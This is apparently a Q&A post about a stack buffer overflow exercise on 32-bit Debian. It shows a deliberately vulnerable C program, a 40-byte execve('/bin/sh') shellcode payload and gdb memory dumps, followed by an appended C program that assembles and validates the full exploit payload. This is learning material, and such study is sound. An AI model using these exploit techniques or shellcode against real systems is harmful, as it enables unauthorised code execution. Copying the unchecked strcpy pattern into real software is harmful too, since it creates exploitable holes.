I'm sure that I got the return address right, but I got a segmentation fault after returning from the main function.
I'm using 32-bit Debian GNU/Linux 10 (buster).
The C program is:
// victim.c
#include <string.h>
int main(int argc, char* argv[]) {
    char little_array[512];          // 512-byte stack buffer
    if(argc > 1)
        strcpy(little_array, argv[1]); // no length check: a long argv[1] overruns little_array
    return 0;
}
Compile it with:
gcc -fno-stack-protector -z execstack -fno-pie -ggdb -mpreferred-stack-boundary=2 victim.c -o victim
My payload is (512 + 8 bytes):
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf"
Explanation:
shellcode (40 bytes): \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
padding (476 bytes): %0476x
new return address (shellcode address in the stack, 4 bytes):
\xc8\xee\xff\xbf
Output of gdb:
zoemurmure@debian:~/shellcoders/chapter2$ gdb victim
GNU gdb (Debian 8.2.1-2) 8.2.1
...
(gdb) set args $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")
(gdb) disas main
Dump of assembler code for function main:
0x00001199 <+0>: push %ebp
0x0000119a <+1>: mov %esp,%ebp
0x0000119c <+3>: sub $0x200,%esp
0x000011a2 <+9>: cmpl $0x1,0x8(%ebp)
0x000011a6 <+13>: jle 0x11c0 <main+39>
0x000011a8 <+15>: mov 0xc(%ebp),%eax
0x000011ab <+18>: add $0x4,%eax
0x000011ae <+21>: mov (%eax),%eax
0x000011b0 <+23>: push %eax
0x000011b1 <+24>: lea -0x200(%ebp),%eax
0x000011b7 <+30>: push %eax
0x000011b8 <+31>: call 0x11b9 <main+32>
0x000011bd <+36>: add $0x8,%esp
0x000011c0 <+39>: mov $0x0,%eax
0x000011c5 <+44>: leave
0x000011c6 <+45>: ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x11a2: file victim.c, line 5.
(gdb) run
Starting program: /home/zoemurmure/shellcoders/chapter2/victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")
Breakpoint 1, main (argc=2, argv=0xbffff164) at victim.c:5
5 if(argc > 1)
(gdb) n
6 strcpy(little_array, argv[1]);
(gdb) x/20x $esp
0xbfffeec8: 0x00000001 0xb7fffc5c 0x3a5d7643 0x0000a1ab
0xbfffeed8: 0xfffff8a0 0xb7f5c362 0xbfffef01 0x00000000
0xbfffeee8: 0xbfffef28 0x00000007 0xb7fd4128 0x6e43a318
0xbfffeef8: 0xb7fffc50 0xb7fdffad 0x00000000 0x00000000
0xbfffef08: 0xb7fd41a0 0x00000007 0xb7fd41c0 0xb7fffc50
(gdb) x/20x $ebp
0xbffff0c8: 0x00000000 0xb7df8b41 0x00000002 0xbffff164
0xbffff0d8: 0xbffff170 0xbffff0f4 0x00000001 0x00000000
0xbffff0e8: 0xb7fb8000 0xffffffff 0xb7fff000 0x00000000
0xbffff0f8: 0xb7fb8000 0xb7fb8000 0x00000000 0x7f85b6f2
0xbffff108: 0x3f7210e2 0x00000000 0x00000000 0x00000000
(gdb) n
8 return 0;
(gdb) x/20x $esp
0xbfffeec8: 0x315e1aeb 0x074688c0 0x5e891e8d 0x0c468908
0xbfffeed8: 0xf3890bb0 0x8d084e8d 0x80cd0c56 0xffffe1e8
0xbfffeee8: 0x69622fff 0x68732f6e 0x30303030 0x30303030
0xbfffeef8: 0x30303030 0x30303030 0x30303030 0x30303030
0xbfffef08: 0x30303030 0x30303030 0x30303030 0x30303030
(gdb) x/20x $ebp
0xbffff0c8: 0x30303030 0xbfffeec8 0x00000000 0xbffff164
0xbffff0d8: 0xbffff170 0xbffff0f4 0x00000001 0x00000000
0xbffff0e8: 0xb7fb8000 0xffffffff 0xb7fff000 0x00000000
0xbffff0f8: 0xb7fb8000 0xb7fb8000 0x00000000 0x7f85b6f2
0xbffff108: 0x3f7210e2 0x00000000 0x00000000 0x00000000
(gdb) n
9 }
(gdb) n
0xbfffeec8 in ?? ()
Notice that after
strcpy(little_array, argv[1]);
you can see that the new return address in the output of x/20x $ebp has been updated to 0xbfffeec8, and then:
0xbfffeec8 in ?? ()
What's the problem? Thanks.
User contributions licensed under CC BY-SA 3.0
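The following is an added example, not code from the question above. It rebuilds the 520-byte payload from the post (shellcode, 476 filler bytes, return address) in C instead of with printf, and runs the checks one would want before blaming the return address: that the payload contains no NUL byte (strcpy would stop there and nothing after it would reach little_array), that the shellcode's own jmp/call offsets land where the jmp/call/pop trick needs them (the jmp at offset 0 must hit the call at offset 28, the call must return to the pop %esi at offset 2, and "/bin/sh" must sit right after the call), and that the return address equals the buffer address, because with the shellcode at the very start of the buffer there is no NOP sled and the address has to be exact. The buffer address 0xbfffeec8 is taken from the gdb session in the post (little_array = %ebp - 0x200); the '0' filler byte reproduces what %0476x printed. Both are assumptions about this particular run.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE       512   /* sizeof little_array in victim.c */
#define FRAME_OVERHEAD 8     /* saved %ebp + return address below the buffer */
#define PAYLOAD_LEN    (BUF_SIZE + FRAME_OVERHEAD)

/* The 40-byte execve("/bin/sh") shellcode from the post, byte for byte. */
static const unsigned char shellcode[] =
    "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
    "\xff/bin/sh";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Target offset of a 2-byte short jmp (EB rel8) located at code[off]. */
int short_jmp_target(const unsigned char *code, int off) {
    return off + 2 + (int8_t)code[off + 1];
}

/* Target offset of a 5-byte near call (E8 rel32) located at code[off]. */
int call_target(const unsigned char *code, int off) {
    int32_t rel;
    memcpy(&rel, code + off + 1, sizeof rel);   /* x86 stores rel32 little-endian */
    return off + 5 + rel;
}

/* Index of the first NUL in p[0..n), or -1 if there is none. strcpy stops at
 * the first NUL, so every byte after it would never be copied into the buffer. */
int first_nul(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return (int)i;
    return -1;
}

/* With the shellcode at the start of little_array and no NOP sled in front of
 * it, the overwritten return address must equal the buffer address exactly. */
int ret_addr_ok(uint32_t buf_addr, uint32_t ret_addr) {
    return ret_addr == buf_addr;
}

/* Assemble shellcode | fill | ret_addr (little-endian) into out.
 * The filler covers the rest of the buffer plus the saved %ebp slot (476
 * bytes, as in the post). Returns the payload length, or -1 if out is too small. */
int build_payload(unsigned char *out, size_t out_len, uint32_t ret_addr, unsigned char fill) {
    if (out_len < PAYLOAD_LEN) return -1;
    size_t pad = BUF_SIZE + 4 - SHELLCODE_LEN;
    memcpy(out, shellcode, SHELLCODE_LEN);
    memset(out + SHELLCODE_LEN, fill, pad);
    for (int i = 0; i < 4; i++)
        out[SHELLCODE_LEN + pad + i] = (unsigned char)(ret_addr >> (8 * i));
    return (int)(SHELLCODE_LEN + pad + 4);
}

int main(void) {
    const uint32_t buf_addr = 0xbfffeec8u;   /* assumed: little_array as seen in the post's gdb run */
    unsigned char payload[PAYLOAD_LEN];
    int n = build_payload(payload, sizeof payload, buf_addr, '0');

    if (n < 0 || first_nul(payload, (size_t)n) >= 0) {
        fprintf(stderr, "payload contains a NUL and would be truncated by strcpy\n");
        return 1;
    }
    if (short_jmp_target(shellcode, 0) != 28 || call_target(shellcode, 28) != 2 ||
        !ret_addr_ok(buf_addr, buf_addr)) {
        fprintf(stderr, "shellcode layout or return address check failed\n");
        return 1;
    }
    /* Emit raw bytes so the payload can be passed as: ./victim "$(./payload)" */
    fwrite(payload, 1, (size_t)n, stdout);
    return 0;
}
```

Two caveats when using this against the binary from the post: the checks above only validate the payload's internal layout, and the buffer address must come from the same environment the exploit runs in. gdb runs the program by its full path and adds environment variables of its own, which shifts stack addresses relative to a plain shell invocation, so an address read out of gdb is only valid inside gdb.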